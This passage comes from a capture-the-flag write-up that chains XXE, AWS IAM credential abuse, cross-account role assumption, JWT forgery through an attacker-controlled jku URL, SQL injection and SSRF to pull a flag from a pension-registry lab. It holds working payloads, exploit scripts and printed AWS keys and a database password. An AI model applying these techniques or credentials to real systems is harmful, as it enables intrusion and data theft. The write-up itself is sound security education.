  • Debug mode is enabled (debug=True) on the Bottle application, which may leak sensitive information through verbose error pages
  • The other subsystem, National Pension Registry, resides in another internal network
  • Some IP whitelisting checks are performed by the National Pension Registry application

At this point, we can attempt to guess the IP address or hostname of the National Pension Registry subsystem and use the SSRF vulnerabilities to access the other application. Unfortunately, there is a coding flaw in the application which causes it to crash too easily, making it difficult to execute this strategy successfully.

Exploiting XXE to Disclose /app/.env & Obtain AWS IAM Keys

Looking at the possible vulnerabilities to be exploited, we see that we are able to use XXE to read /app/.env to obtain environment variables which may contain “database and other relevant credentials”.

For convenience, we can use the sample document at /app/files/sample-data.xml:

<?xml version="1.0" encoding="ISO-8859-1"?>
<employees>
    <employee>
        <firstname>John</firstname>
        <lastname>Doe</lastname>
        <contributions>
            <january>215</january>
            <february>215</february>
            <march>215</march>
            <april>215</april>
            <may>215</may>
            <june>215</june>
            <july>215</july>
            <august>215</august>
            <september>215</september>
            <october>215</october>
            <november>215</november>
        </contributions>
    </employee>
</employees>

Then, we modify it to include an XXE payload in the firstname field as such:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///app/.env">]>
<employees>
    <employee>
        <firstname>&xxe;</firstname>
        <lastname>Doe</lastname>
        <contributions>
            <january>215</january>
            <february>215</february>
            <march>215</march>
            <april>215</april>
            <may>215</may>
            <june>215</june>
            <july>215</july>
            <august>215</august>
            <september>215</september>
            <october>215</october>
            <november>215</november>
        </contributions>
    </employee>
</employees>

After that, we upload it using the Employee Pension Contribution Upload Form, and the file contents of /app/.env are returned after Full Name: in the response:

[Image: XXE Response]
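
For reference, the upload can also be scripted. Here’s a minimal Python sketch using requests, assuming the crafted payload above is saved locally as xxe-data.xml (a hypothetical filename; the xml-data-file form field name comes from app.py):

import requests

EPCUF = "http://epcuf-cluster-alb-1647361482.ap-southeast-1.elb.amazonaws.com"

# Upload the crafted XML; the form field is named "xml-data-file" (see app.py)
with open("xxe-data.xml", "rb") as f:
    resp = requests.post(f"{EPCUF}/import",
                         files={"xml-data-file": ("xxe-data.xml", f, "text/xml")})
# /app/.env contents appear after "Full Name:" in the rendered template
print(resp.text)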

And we discover the long-term credentials for nprs-cross-handler! :smile:
We have now completed half the challenge :scream:, so let’s pause for a minute and take a quick look at our progress thus far before continuing on:

[Image: Midpoint of Attack Path]

Enumerating NPRS Cross Handler

Let’s reconfigure WeirdAAL and the AWS CLI to use the new credentials we just obtained for nprs-cross-handler, then re-run the recon module of WeirdAAL and list all permitted actions.

$ aws configure --profile nprs-cross-handler
AWS Access Key ID [None]: AKIAU65ZHERXDDIVSXPO
AWS Secret Access Key [None]: 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
Default region name [None]: ap-southeast-1
Default output format [None]:

$ cat .env
[default]
aws_access_key_id = AKIAU65ZHERXDDIVSXPO
aws_secret_access_key = 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

$ python3 weirdAAL.py -m recon_all -t nprs-cross-handler
Account Id: 341301470318
AKIAU65ZHERXDDIVSXPO : Is NOT a root key
...

$ python3 weirdAAL.py -m list_services_by_key -t nprs-cross-handler
[+] Services enumerated for AKIAU65ZHERXDDIVSXPO [+]
elasticbeanstalk.DescribeApplicationVersions
elasticbeanstalk.DescribeApplications
elasticbeanstalk.DescribeEnvironments
elasticbeanstalk.DescribeEvents
opsworks.DescribeStacks
route53.ListGeoLocations
sts.GetCallerIdentity

Nothing interesting was found when invoking the respective accessible actions listed above using the AWS CLI.

Since the automated enumeration did not work well, it is time to fall back to manual enumeration.
I got stuck here during the competition even though I already knew how to get the flag at this point (I just needed the IP address or hostname of the National Pension Registry sub-system) and had done everything below, but I obtained different results from what I should have been seeing. Perhaps I enumerated using the wrong IAM keys; I don’t actually know. In hindsight, better note-taking and removing unused credentials from ~/.aws/credentials could have helped to avoid such an outcome.

Moving on, we enumerate the policies attached to the user nprs-cross-handler to determine what privileges the user has. There are two primary types of identity-based policies, namely Managed Policies and Inline Policies. In short, a Managed Policy is a standalone policy that can be attached to multiple IAM identities (users, groups or roles), whereas an Inline Policy is embedded in, and applies to, a single identity only.

To enumerate Inline Policies, we can use the aws iam list-user-policies command:

$ aws iam list-user-policies --user-name nprs-cross-handler --profile nprs-cross-handler

An error occurred (AccessDenied) when calling the ListUserPolicies operation: User: arn:aws:iam::341301470318:user/nprs-cross-handler is not authorized to perform: iam:ListUserPolicies on resource: user nprs-cross-handler

Nope. Let’s enumerate Managed Policies next using the aws iam list-attached-user-policies command:

$ aws iam list-attached-user-policies --user-name nprs-cross-handler
{
    "AttachedPolicies": [
        {
            "PolicyName": "nprs-cross-handler-policy",
            "PolicyArn": "arn:aws:iam::341301470318:policy/nprs-cross-handler-policy"
        }
    ]
}

Seems like there is a managed policy nprs-cross-handler-policy attached to the nprs-cross-handler user.
Let’s retrieve more information about the managed policy discovered.

Note: It’s also a good idea to enumerate all versions of the policies, but since v1 of nprs-cross-handler-policy is irrelevant for this challenge, I will be omitting it for brevity.

$ aws iam get-policy --policy-arn 'arn:aws:iam::341301470318:policy/nprs-cross-handler-policy' --profile nprs-cross-handler
{
    "Policy": {
        "PolicyName": "nprs-cross-handler-policy",
        "PolicyId": "ANPAU65ZHERXBFWDQBCMX",
        "Arn": "arn:aws:iam::341301470318:policy/nprs-cross-handler-policy",
        "Path": "/",
        "DefaultVersionId": "v2",
        "AttachmentCount": 1,
        "PermissionsBoundaryUsageCount": 0,
        "IsAttachable": true,
        "CreateDate": "2020-11-19T01:46:50Z",
        "UpdateDate": "2020-11-29T08:27:10Z"
    }
}

$ aws iam get-policy-version --policy-arn 'arn:aws:iam::341301470318:policy/nprs-cross-handler-policy' --version-id v2 --profile nprs-cross-handler
{
    "PolicyVersion": {
        "Document": {
            "Version": "2012-10-17",
            "Statement": [
                {
                    "Sid": "VisualEditor0",
                    "Effect": "Allow",
                    "Action": "iam:ListAttachedUserPolicies",
                    "Resource": "arn:aws:iam::341301470318:user/*"
                },
                {
                    "Sid": "VisualEditor1",
                    "Effect": "Allow",
                    "Action": [
                        "iam:GetPolicy",
                        "iam:GetPolicyVersion"
                    ],
                    "Resource": "arn:aws:iam::341301470318:policy/*"
                },
                {
                    "Sid": "VisualEditor2",
                    "Effect": "Allow",
                    "Action": "sts:AssumeRole",
                    "Resource": "arn:aws:iam::628769934365:role/cross-account-ec2-access"
                }
            ]
        },
        "VersionId": "v2",
        "IsDefaultVersion": true,
        "CreateDate": "2020-11-29T08:27:10Z"
    }
}

It looks like the attached user policy allows the nprs-cross-handler user to assume the role cross-account-ec2-access!
Let’s request temporary credentials for the assumed role using the aws sts assume-role command.

$ aws sts assume-role --role-arn 'arn:aws:iam::628769934365:role/cross-account-ec2-access' --role-session-name session
{
    "Credentials": {
        "AccessKeyId": "ASIAZEZM3ZQOVCX7EEF4",
        "SecretAccessKey": "NgAGcf1HnpIAjrNdqv3E7XGXy1D9h5AC5IdfTAxj",
        "SessionToken": "FwoGZXIvYXdzENH//////////wEaDHejxi0VSza/b+hi/yKrAYDc6cpf8NeBGGCCXVy6RKbQCvQBVt/OY+97yMxP6oKaMpQWMM4L7vxB3KlLBFLkVM5TEbXZutQrmmGQlFQV1nRSHHk902qTgRGFvewf8yoFfAKKEZZbyxWi0I8eRiaDt1Db6G6W2FyBjEqVR0bZV3DrJefEQ1LJDCNTWU1a3uy2pWu813s4hu09o3RKIAfxuXhh09zr5dK3cJ0UH0gS85Oar2qSIETW0t/NNSjF+MH+BTItGrwf4r3UciOrx8c0eXEP5AascpUy6c/jP5DRa62+tVI2uUirQz6I8OfyPKSu",
        "Expiration": "2020-12-09T08:27:01Z"
    },
    "AssumedRoleUser": {
        "AssumedRoleId": "AROAZEZM3ZQORFHAJAKYS:session",
        "Arn": "arn:aws:sts::628769934365:assumed-role/cross-account-ec2-access/session"
    }
}
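
The same role assumption can also be done with boto3; a rough sketch (assuming the nprs-cross-handler profile is configured as above) is shown below:

import boto3

session = boto3.Session(profile_name="nprs-cross-handler")
resp = session.client("sts").assume_role(
    RoleArn="arn:aws:iam::628769934365:role/cross-account-ec2-access",
    RoleSessionName="session",
)
creds = resp["Credentials"]
# These temporary credentials expire; note the Expiration timestamp
print(creds["AccessKeyId"], creds["Expiration"])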

Enumerating Cross Account EC2 Access Role

Now that we have temporary credentials for the cross-account-ec2-access role, let’s reconfigure WeirdAAL and the AWS CLI yet again to use the temporary credentials for the assumed role, then re-run the recon module of WeirdAAL and list all permitted actions.

$ cat ~/.aws/credentials
[cross-account-ec2-access]
aws_access_key_id=ASIAZEZM3ZQOVCX7EEF4
aws_secret_access_key=NgAGcf1HnpIAjrNdqv3E7XGXy1D9h5AC5IdfTAxj
aws_session_token=FwoGZXIvYXdzENH//////////wEaDHejxi0VSza/b+hi/yKrAYDc6cpf8NeBGGCCXVy6RKbQCvQBVt/OY+97yMxP6oKaMpQWMM4L7vxB3KlLBFLkVM5TEbXZutQrmmGQlFQV1nRSHHk902qTgRGFvewf8yoFfAKKEZZbyxWi0I8eRiaDt1Db6G6W2FyBjEqVR0bZV3DrJefEQ1LJDCNTWU1a3uy2pWu813s4hu09o3RKIAfxuXhh09zr5dK3cJ0UH0gS85Oar2qSIETW0t/NNSjF+MH+BTItGrwf4r3UciOrx8c0eXEP5AascpUy6c/jP5DRa62+tVI2uUirQz6I8OfyPKSu

$ cat .env
[default]
aws_access_key_id=ASIAZEZM3ZQOVCX7EEF4
aws_secret_access_key=NgAGcf1HnpIAjrNdqv3E7XGXy1D9h5AC5IdfTAxj
aws_session_token=FwoGZXIvYXdzENH//////////wEaDHejxi0VSza/b+hi/yKrAYDc6cpf8NeBGGCCXVy6RKbQCvQBVt/OY+97yMxP6oKaMpQWMM4L7vxB3KlLBFLkVM5TEbXZutQrmmGQlFQV1nRSHHk902qTgRGFvewf8yoFfAKKEZZbyxWi0I8eRiaDt1Db6G6W2FyBjEqVR0bZV3DrJefEQ1LJDCNTWU1a3uy2pWu813s4hu09o3RKIAfxuXhh09zr5dK3cJ0UH0gS85Oar2qSIETW0t/NNSjF+MH+BTItGrwf4r3UciOrx8c0eXEP5AascpUy6c/jP5DRa62+tVI2uUirQz6I8OfyPKSu

$ python3 weirdAAL.py -m recon_all -t cross-account-ec2-access
Account Id: 341301470318
ASIAZEZM3ZQOVCX7EEF4 : Is NOT a root key
...

$ python3 weirdAAL.py -m list_services_by_key -t cross-account-ec2-access
[+] Services enumerated for ASIAZEZM3ZQO4WFMZ3U2 [+]
ec2.DescribeAccountAttributes
ec2.DescribeAddresses
...
elasticbeanstalk.DescribeApplicationVersions
elasticbeanstalk.DescribeApplications
elasticbeanstalk.DescribeEnvironments
elasticbeanstalk.DescribeEvents
elb.DescribeLoadBalancers
elbv2.DescribeLoadBalancers
opsworks.DescribeStacks
route53.ListGeoLocations
sts.GetCallerIdentity

If we run the aws elbv2 describe-load-balancers command, we can find the npr-cluster-alb deployed for the National Pension Registry application.

$ aws elbv2 describe-load-balancers --profile cross-account-ec2-access
{
    "LoadBalancers": [
        {
            "LoadBalancerArn": "arn:aws:elasticloadbalancing:ap-southeast-1:628769934365:loadbalancer/app/npr-cluster-alb/96b0036340fbf14d",
            "DNSName": "internal-npr-cluster-alb-1113089864.ap-southeast-1.elb.amazonaws.com",
            "CanonicalHostedZoneId": "Z1LMS91P8CMLE5",
            "CreatedTime": "2020-11-29T04:03:22.810Z",
            "LoadBalancerName": "npr-cluster-alb",
            "Scheme": "internal",
            "VpcId": "vpc-0dcb6e571fd026058",
            "State": {
                "Code": "active"
            },
            "Type": "application",
            "AvailabilityZones": [
                {
                    "ZoneName": "ap-southeast-1b",
                    "SubnetId": "subnet-0814fe411ae20fcc7",
                    "LoadBalancerAddresses": []
                },
                {
                    "ZoneName": "ap-southeast-1a",
                    "SubnetId": "subnet-0be4fa2daa74f89dd",
                    "LoadBalancerAddresses": []
                }
            ],
            "SecurityGroups": [
                "sg-0dc2665a5ee555216"
            ],
            "IpAddressType": "ipv4"
        }
    ]
}

Notice that the DNS Name for the ALB starts with internal-, which indicates that the npr-cluster-alb is an internally-accessible ALB.

We can also verify it by querying the A records for the DNS name:

$ dig +short internal-npr-cluster-alb-1113089864.ap-southeast-1.elb.amazonaws.com -t A @8.8.8.8
10.1.1.173
10.1.0.170

This confirms our suspicion. Since the application is only accessible via the internal network, we probably have to leverage the SSRF vulnerabilities in the Employee Pension Contribution Upload Form application to reach the National Pension Registry application.

We are finally close to getting the flag! It is also likely that we need to exploit additional vulnerabilities in the National Pension Registry application to obtain it.

Here’s a quick recap of our progress before we continue on:

[Image: Attack Path Reaching National Pension Registry]

Analysing Docker Image for National Pension Registry

Let’s analyse the Docker image for the National Pension Registry application just like how we did for the Employee Pension Contribution Upload Form application.

$ docker run -it 341301470318.dkr.ecr.ap-southeast-1.amazonaws.com/national-pension-registry /bin/bash
root@59e384a24601:/usr/src/app# ls -al
total 72
drwxr-xr-x   1 root root  4096 Nov 29 03:43 .
drwxr-xr-x   1 root root  4096 Nov 19 01:41 ..
-rw-r--r--   1 root root  5587 Nov 28 19:41 index.js
drwxr-xr-x 120 root root  4096 Nov 19 01:41 node_modules
-rw-r--r--   1 root root 41347 Nov 16 17:56 package-lock.json
-rw-r--r--   1 root root   490 Nov 16 17:56 package.json
drwxr-xr-x   2 root root  4096 Nov 29 03:43 prod-keys
root@59e384a24601:/usr/src/app# ls -al prod-keys
total 16
drwxr-xr-x 2 root root 4096 Nov 29 03:43 .
drwxr-xr-x 1 root root 4096 Nov 29 03:43 ..
-rw-r--r-- 1 root root 1674 Nov 22 23:12 prod-private-key.pem
-rw-r--r-- 1 root root  558 Nov 22 23:12 prod-public-keys.json

The source code for /usr/src/app/index.js is shown below:

const { Sequelize } = require('sequelize');
const jwt = require('jsonwebtoken');
const jwksClient = require('jwks-rsa');
const fs = require('fs');
const privateKey = fs.readFileSync('prod-keys/prod-private-key.pem');
const jku_link = "http://127.0.0.1:8333/prod-public-keys.json";
const sequelize = new Sequelize('postgres://npr-rds-read-only:e8CSsKdk1s2pRQ3b@national-pension-registry.cdfsuhqgjz6k.ap-southeast-1.rds.amazonaws.com:5432/national_pension_records');
const express = require('express');
const bodyParser = require('body-parser');
const ipRangeCheck = require("ip-range-check");
const url = require('url');
const app = express();
const whitelistedIPRanges = ["127.0.0.1/32","15.193.2.0/24","15.177.82.0/24","122.248.192.0/18","54.169.0.0/16","54.255.0.0/16","52.95.255.32/28","175.41.128.0/18","13.250.0.0/15","64.252.102.0/24","99.77.143.0/24","52.76.128.0/17","64.252.103.0/24","52.74.0.0/16","54.179.0.0/16","52.220.0.0/15","18.142.0.0/15","46.137.192.0/19","46.137.224.0/19","46.51.216.0/21","52.94.248.32/28","54.254.0.0/16","54.151.128.0/17","18.136.0.0/16","13.212.0.0/15","3.5.146.0/23","64.252.104.0/24","18.140.0.0/15","52.95.242.0/24","99.77.161.0/24","3.5.148.0/22","18.138.0.0/15","52.119.205.0/24","52.76.0.0/17","54.251.0.0/16","64.252.105.0/24","3.0.0.0/15","52.77.0.0/16","13.228.0.0/15"];

app.use(bodyParser.urlencoded({ extended: true }));

const authenticateJWT = async(req, res, next) => {
    const authHeader = req.headers.authorization;
    if (authHeader) {
        const authenticationType = authHeader.split(' ')[0];
        const token = authHeader.split(' ')[1];
        if (authenticationType === "Bearer") {
            let usage = req.query.usage;
            let check = await validateUserClaim(usage,token);
            if (check) {
                next();
            }else {
                res.sendStatus(401);
            }
        }else {
            res.sendStatus(401);
        }
    } else {
        res.sendStatus(401);
    }
};

function validateUserInputs(payload){
    // check for special characters
    var format = /[`!@#$%^&*()+\-=\[\]{}':"\\|,<>\/?~]/;
    return format.test(payload);
}

async function getCustomReport(contributorId){
    const results = await sequelize.query('SELECT * from records."contributions" where contributor_id = ' + contributorId, { type: sequelize.QueryTypes.SELECT });
    console.log(results);
    return results[0];
}

async function getSummaryReport(){
    const results = await sequelize.query('select sum(contribution_total) from records.contributions', { type: sequelize.QueryTypes.SELECT });
    return results[0];
}

async function validateUserClaim(usage, rawToken) {
    let payload = await verifyToken(rawToken);
    if (payload != null) {
        // Simple RBAC
        // Only allow Admin to pull the results
        if (usage == "custom-report"){
            if (payload.role == "admin") {
                return true;
            } else {
                return false;
            }
        }

        if (usage == "user-report"){
            if (payload.role == "user") {
                return true;
            } else {
                return false;
            }
        }

        if (usage == "summary-report"){
            if (payload.role == "anonymous") {
                return true;
            } else {
                return false;
            }
        }
    }
    return false;
}

async function verifyToken(rawToken) {
    var decodedToken = jwt.decode(rawToken, {complete: true});
    const provided_jku = url.parse(decodedToken.header.jku);
    if (ipRangeCheck(provided_jku.hostname, whitelistedIPRanges)) {
        const client = jwksClient({
            jwksUri: decodedToken.header.jku,
            timeout: 30000, // Defaults to 30s
        });
        const kid = decodedToken.header.kid;
        let publicKey = await client.getSigningKeyAsync(kid).then(key => {
         return key.getPublicKey();
        }, err => {
            return null;
        });
        try {
            let payload = jwt.verify(rawToken, publicKey);
            return payload;
        } catch (err) {
            return null;
        }
    } else {
        return null;
    }
}

function getAuthenticationToken(username,password) {
    // Wait for dev team to update the user account database
    // user account database should be live in Jan 2020
    // Issue only guest user tokens for now
    let custom_headers = {"jku" : jku_link};
    var token = jwt.sign({ user: 'guest', role: 'anonymous' }, privateKey, { algorithm: 'RS256', header: custom_headers});
    return token;
}

app.post('/authenticate', (req, res) => {
    // ignore username and password for now
    // issue only guest jwt token for development
    res.json({"token" : getAuthenticationToken(req.body.username, req.body.password)})
});

app.get('/report', authenticateJWT, async (req, res, next) => {
    let message = {
        "message" : "invalid parameters"
    }
    try {
        if (req.query.usage == "custom-report") {
            if(!validateUserInputs(req.query.contributor_id)) {
                res.json({"results" : await getCustomReport(req.query.contributor_id)});
            } else {
                res.json(message);
            }
        } else if (req.query.usage == "summary-report") {
            res.json({"results" : await getSummaryReport()});
        } else {
            res.json(message);
        }
        next();
    } catch (e) {
        next(e);
    }
    
});

app.listen(80, () => {
    console.log('National Pension Registry API Server running on port 80!');
});

Like the previous application, there are quite a few obvious issues with the code.
Several observations can be made here:

  • There is SQL injection (SQLi) in getCustomReport(), but most special characters are not permitted in the user input
  • Only a valid JSON Web Token (JWT) with the admin role in its payload is permitted to execute the custom report
  • The /authenticate POST endpoint issues a JWT for the anonymous role
  • The /report GET endpoint authenticates the JWT and allows executing the custom report function
  • The JWT verification fetches the jku (JWK Set URL) header parameter of the token and verifies the JWT using the public key obtained from the jku URL
  • The jku URL is validated against a predefined allow-list, which appears to consist of the loopback address and AWS IP address ranges
  • There are also hardcoded credentials for the PostgreSQL database hosted on Amazon Relational Database Service (Amazon RDS), accessible via the internal network

Chaining The Exploits

Hosting Our Webserver on AWS

Since we can control the jku in the JWT header, and the accepted IPv4 ranges include AWS IP address ranges, we can simply host a webserver on an Amazon Elastic Compute Cloud (Amazon EC2) instance serving the required prod-public-keys.json file to pass the validation checks against the predefined allow-list of IPv4 address ranges.

For example, if the IPv4 address allocated to our AWS EC2 instance is 3.1.33.7, it resides within the permitted 3.0.0.0/15 range.
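
To see why this works, note that the application’s ipRangeCheck() call boils down to a CIDR membership test. A Python sketch of the same check, using an excerpt of the app’s allow-list and the example EC2 address above:

from ipaddress import ip_address, ip_network

# Excerpt of the application's whitelistedIPRanges
whitelisted = ["127.0.0.1/32", "3.0.0.0/15", "13.228.0.0/15"]

hostname = "3.1.33.7"  # our EC2 instance's public IP from the example above
allowed = any(ip_address(hostname) in ip_network(cidr) for cidr in whitelisted)
print(allowed)  # True -> the app will fetch our jku URL and trust our public key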

Signing Our Own JWT Token

Next, we need to sign our own valid JWT token with role set to admin in the payload before we are able to execute a custom report. We can modify the National Pension Registry Node.js application to sign our own JWT tokens and also serve the JWT public key:

const jwt = require('jsonwebtoken');
const fs = require('fs');
const privateKey = fs.readFileSync('prod-keys/prod-private-key.pem');
const publicKey = fs.readFileSync('prod-keys/prod-public-keys.json');
const PORT = 8080;
const jku_link = `http://3.1.33.7:${PORT}/prod-public-keys.json`;
const express = require('express');
const app = express();

// Sign and return our own JWT token with role set to admin and jku_link pointing to this server
app.get('/authenticate', (req, res) => {
    let custom_headers = {"jku" : jku_link};
    var token = jwt.sign({ user: 'admin', role: 'admin' }, privateKey, { algorithm: 'RS256', header: custom_headers});
    res.end(token);
});

// Serve the JWT public key on this endpoint
app.get('/prod-public-keys.json', (req, res) => {
  res.json(JSON.parse(publicKey));
});

app.listen(PORT, () => {
    console.log(`National Pension Registry API Server running on port ${PORT}!`);
});

Afterwards, we install the dependencies for the application and start the server:

$ npm install jsonwebtoken express
$ node server.js
National Pension Registry API Server running on port 8080!

SQL Injection

There is one last hurdle to get past – we also need to perform SQL injection successfully so that we can get the flag.

Let’s start by analysing the regular expression used to validate the user input:

function validateUserInputs(payload){
    // check for special characters
    var format = /[`!@#$%^&*()+\-=\[\]{}':"\\|,<>\/?~]/;
    return format.test(payload);
}

Seems like we are able to use alphanumeric, whitespace, _, ; and . characters.
At this point, we can guess that the flag must be somewhere in the database, likely as one of the records in the same table being queried.
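
Before firing payloads through the SSRF chain, we can replicate validateUserInputs() locally to sanity-check which payloads survive the filter; a quick Python sketch:

import re

# Same character blocklist as the app's validateUserInputs()
blocked = re.compile(r"""[`!@#$%^&*()+\-=\[\]{}':"\\|,<>/?~]""")

for payload in ("1 OR null is null",
                "1 OR null is null limit 1 offset 1",
                "1; DROP TABLE x --"):
    print(payload, "->", "rejected" if blocked.search(payload) else "allowed")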

Let’s examine the SQL query too:

async function getCustomReport(contributorId){
    const results = await sequelize.query('SELECT * from records."contributions" where contributor_id = ' + contributorId, { type: sequelize.QueryTypes.SELECT });
    console.log(results);
    return results[0];
}

We can see that the injection point is not inside a quoted string. Referencing the permitted characters, we can make the WHERE condition always true by doing:

SELECT * from records."contributions" where contributor_id = 1 OR null is null

Since null is null is always true, this nullifies the contributor_id = 1 condition and makes the WHERE clause match every row. Besides that, notice that the function returns only the first record returned by the query. Since there is no ORDER BY clause, the results are not sorted before being returned, which lets us fetch the first record in the records.contributions table. If the flag is not the first record, we can further use the LIMIT and OFFSET keywords to select a specific record from the table precisely.

For example, to select the first record from the table:

SELECT * from records."contributions" where contributor_id = 1 OR null is null limit 1 offset 0

Or, to select the second record from the table:

SELECT * from records."contributions" where contributor_id = 1 OR null is null limit 1 offset 1

And so on.

Getting Flag

Recall that the Employee Pension Contribution Upload Form application is accessible at http://epcuf-cluster-alb-1647361482.ap-southeast-1.elb.amazonaws.com/ and the National Pension Registry is accessible at http://internal-npr-cluster-alb-1113089864.ap-southeast-1.elb.amazonaws.com/ in the internal network.

Chaining all the exploits together, we use the SSRF on the Employee Pension Contribution Upload Form application to perform SQL injection on the National Pension Registry backend application by running the following curl command on our AWS EC2 instance:

$ curl -X POST 'http://epcuf-cluster-alb-1647361482.ap-southeast-1.elb.amazonaws.com/report' \
    --data-urlencode 'endpoint=http://internal-npr-cluster-alb-1113089864.ap-southeast-1.elb.amazonaws.com/report' \
    --data-urlencode 'usage=custom-report' \
    --data-urlencode 'contributor_id=1 or null is null limit 1 offset 0' \
    --data-urlencode "token=$(curl -s http://localhost:8080/authenticate)"
{"results":{"contributor_id":7531,"contributor_name":"govtech-csg{C0nt41n3r$_w1lL-ch4ng3_tH3_FuTuR3}","contribution_total":9999}}

Finally, we got the flag govtech-csg{C0nt41n3r$_w1lL-ch4ng3_tH3_FuTuR3}!
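
For completeness, here’s a sketch of the same chained request in Python requests (assuming the JWT signing server from earlier is running on localhost:8080):

import requests

EPCUF = "http://epcuf-cluster-alb-1647361482.ap-southeast-1.elb.amazonaws.com"
NPR = "http://internal-npr-cluster-alb-1113089864.ap-southeast-1.elb.amazonaws.com"

# Fetch an admin JWT from our local signing server, then fire the SSRF + SQLi
token = requests.get("http://localhost:8080/authenticate").text
resp = requests.post(f"{EPCUF}/report", data={
    "endpoint": f"{NPR}/report",
    "usage": "custom-report",
    "contributor_id": "1 or null is null limit 1 offset 0",
    "token": token,
})
print(resp.text)  # contributor_name holds the flag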

Complete Attack Path

Wow! You’re still here reading this? Thanks for sitting through this entire lengthy walkthrough!

Here’s an overview of the complete attack path for this challenge in case you are interested:

[Image: Overview of Attack Path]

By now, I think it is pretty evident that performing cloud penetration testing is very arduous and can become messy to the point where it gets confusing even for the tester. :tired_face:

I hope you enjoyed the write-up of this challenge, learnt something new, and can now better identify and relate to the common cloud and web security issues found in the wild.